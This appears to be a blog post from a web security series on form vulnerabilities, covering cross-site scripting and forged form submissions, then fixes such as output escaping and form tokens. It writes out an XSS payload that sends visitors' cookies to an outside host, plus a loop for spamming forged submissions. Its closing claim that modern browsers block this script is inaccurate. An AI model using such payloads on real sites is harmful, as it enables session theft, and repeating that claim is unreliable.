Web Applications Security – Forms, when not well formed

The overwhelming response to part 1 of this series was great: lots of queries via Twitter and a bunch of good comments have encouraged me to write more frequently, and I am taking note of that now. As promised, the solution to the query asked in part 1 follows below:

In practice there will be many addresses and many things that can be passed on as a gift, and it would certainly be a better idea to do something like this:

// let us assume that the current user will send the gift as a deliverable to himself/herself
// we will address the issue of sending the gift to someone else in upcoming days
if (isUserRegisteredWithAddress(address)) {
  // pass the address value itself, not the literal string "address"
  performDelivery("gift", address);
}

We will continue toward better solutions throughout the series, but don’t hesitate to post yours right now.

Okay, let’s fasten our seat belts again for a fast-paced ride.

When I asked many developers which tag they think is the most important, most of them answered the <form> tag, because it is the thing that carries everything back and forth between a site and its users.

From a security point of view the <form> tag is “the one” tag that needs the most care. Let’s discuss the various security concerns with this element; later we will discuss various approaches to solving them.

1. Cross site scripting

The de facto well-known hack out there using JavaScript. Let’s see how it works. Consider a form like this:

<form action="SaveReview" method="GET">
  Your name: <input type="text" name="name">
  Your review: <input type="text" name="review">
  <input type="submit" value="Submit">
</form>

Okay, now a user comes along, enters his name as prady, and in the review field enters this:

<script>
document.location = 'http://pradeep-kumar.in/stealCookies?cookies=' + document.cookie;
</script>

You probably take the review of a particular user to show it somewhere on your site. You tried to show prady’s review, and what’s this? He has got the cookies of other users. Your users are being compromised one way or another.

2. Spoofed form submission

Now, for the above form, someone can easily program bogus form submissions. That can be done by anyone, in any technology of his/her choice, something like this:

// initialize variables
name = "prady";
review = "review";
WHILE (1) {
  // initiate a new HTTP request and forge a submission repeatedly
  request = 'http://yoursite.com/saveReview?name=' + name + '&review=' + review;
  name = randomize(name);
  review = randomize(review);
}

Your site will be overwhelmed with reviews in a very short period of time.

Fixing the problems

Let’s discuss a fix for the XSS attack. We can disallow the <script> tag by using regular expressions in our controller for saving new reviews. Most frameworks and CMSs do that for you; let them take care of this issue, for code reuse and better maintainability.
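The post proposes stripping the <script> tag with a regular expression when the review is saved. A regex that removes only that tag leaves other HTML (inline event handlers, attribute breakouts) untouched, so the more robust habit is to encode the stored text at the point where it is inserted into the page. The following is an added example, not code from the original post: a small escaping function and a renderer that applies it to the name and review fields, fed with a constructed review list that includes the exact payload prady submitted above.

```javascript
// Added example (not from the original post): escape untrusted review text when
// it is rendered, so a stored payload is displayed as literal text instead of
// being executed. Output encoding covers more than a regex that strips <script>.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
};

// Replace every character that has meaning in HTML text or attribute context.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Build the review listing the way the page that shows saved reviews would,
// escaping each stored field at the moment it is placed inside markup.
function renderReviews(reviews) {
  return reviews
    .map((r) => `<li><b>${escapeHtml(r.name)}</b>: ${escapeHtml(r.review)}</li>`)
    .join("\n");
}

// Constructed sample data: the review submitted by "prady" in the post above,
// plus an ordinary review containing an ampersand.
const SAMPLE_REVIEWS = [
  {
    name: "prady",
    review:
      "<script>document.location = 'http://pradeep-kumar.in/stealCookies?cookies=' + document.cookie;</script>",
  },
  { name: "alice", review: "Great product & fast shipping" },
];

// The rendered markup contains no live <script> element, only its escaped text.
function renderSample() {
  return renderReviews(SAMPLE_REVIEWS);
}

console.log(renderSample());
```

Escaping on output rather than filtering on input also means the review is stored exactly as the user typed it, which keeps the data intact if it is later shown in a non-HTML context (an email, a JSON API) where different encoding rules apply.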

Now comes the forged form submission. Here we can include an encrypted form number in a hidden field in the form and save the same somewhere on the server; when the user submits the form, we can cross-check the validity of the form itself by matching the form number in the GET request against the ones stored on the server.

These are just some fixes to the problems; most of them are already taken care of, e.g. most browsers don’t allow cross-domain AJAX requests precisely because of XSS. So the script posted above will not work in modern browsers. Please post your solutions to these problems in the comments and stay tuned for the next post.

See you soon.
